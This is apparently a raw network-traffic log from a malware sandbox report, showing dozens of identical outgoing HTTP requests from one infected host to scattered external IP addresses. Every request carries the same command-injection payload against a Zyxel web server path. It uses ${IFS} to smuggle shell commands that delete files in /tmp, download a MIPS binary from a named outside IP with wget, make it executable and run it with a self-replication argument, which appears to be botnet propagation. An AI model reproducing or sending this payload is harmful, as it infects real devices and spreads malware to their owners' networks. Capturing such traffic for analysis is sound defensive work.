                                                        Jan 28, 2024 10:12:55.453450918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5179192.168.2.1457376190.217.115.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453505039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5180192.168.2.143516890.120.114.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453532934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5181192.168.2.1433220191.182.241.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453584909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5182192.168.2.145551672.55.137.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453623056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5183192.168.2.144021280.121.203.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453670025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5184192.168.2.1460194111.100.91.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453705072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5185192.168.2.146065695.232.2.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453744888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5186192.168.2.143937867.168.162.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453767061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5187192.168.2.1455142211.7.66.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453808069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5188192.168.2.143979861.157.162.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453854084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5189192.168.2.144186096.232.77.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453900099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5190192.168.2.144686293.63.91.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453918934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5191192.168.2.14352948.133.205.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453938961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192192.168.2.1450894142.221.65.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453984022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5193192.168.2.1447120220.105.49.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454025030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5194192.168.2.144489219.141.13.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454061031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5195192.168.2.1442356193.204.255.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454096079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5196192.168.2.1433838136.52.77.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454130888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5197192.168.2.144775812.116.102.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454193115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5198192.168.2.143814057.40.251.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454241037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5199192.168.2.143405048.192.124.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454268932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5200192.168.2.1452526182.131.181.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454298973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5201192.168.2.1445758104.236.11.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454363108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5202192.168.2.1449194135.247.253.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454386950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5203192.168.2.1440228140.107.57.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454442978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5204192.168.2.1443038195.228.176.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454480886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5205192.168.2.143554288.9.92.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454550028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5206192.168.2.1446060211.82.88.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454575062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5207192.168.2.143950231.13.3.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454603910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5208192.168.2.1433664107.71.157.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454653978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5209192.168.2.1439690163.185.44.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454693079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5210192.168.2.1436030206.129.152.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454725027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5211192.168.2.144839675.48.127.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454763889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5212192.168.2.145208244.208.133.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454790115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5213192.168.2.1460880150.43.26.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454832077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5214192.168.2.1446404216.161.235.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454885960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5215192.168.2.143422673.101.110.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454922915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5216192.168.2.145446654.229.134.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.454952955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5217192.168.2.1437942118.21.163.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455001116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5218192.168.2.144252499.104.225.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455050945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5219192.168.2.143718620.9.208.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455070019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5220192.168.2.1433202201.252.144.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455115080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5221192.168.2.1451658217.40.144.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455143929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5222192.168.2.1446448167.101.231.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455178976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5223192.168.2.1434306122.210.166.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455229998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5224192.168.2.1440304198.190.16.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455266953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5225192.168.2.1459742106.232.24.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455307007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5226192.168.2.1454098174.46.223.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455343962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5227192.168.2.144603054.113.54.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455368996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5228192.168.2.143523234.243.160.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455410957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5229192.168.2.145023244.147.153.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455442905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5230192.168.2.143809683.105.170.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455496073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5231192.168.2.143831825.238.90.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455543995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5232192.168.2.145439657.135.230.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455568075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5233192.168.2.1444924207.13.216.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.455609083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5234192.168.2.1457882121.252.48.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.458918095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5235192.168.2.1454394132.208.215.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.458960056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5236192.168.2.144597465.115.44.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.458981991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5237192.168.2.1452344147.250.68.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.459017992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5238192.168.2.145926464.112.28.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.459069967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5239192.168.2.1457100145.247.3.157443
                                                        TimestampBytes transferredDirectionData
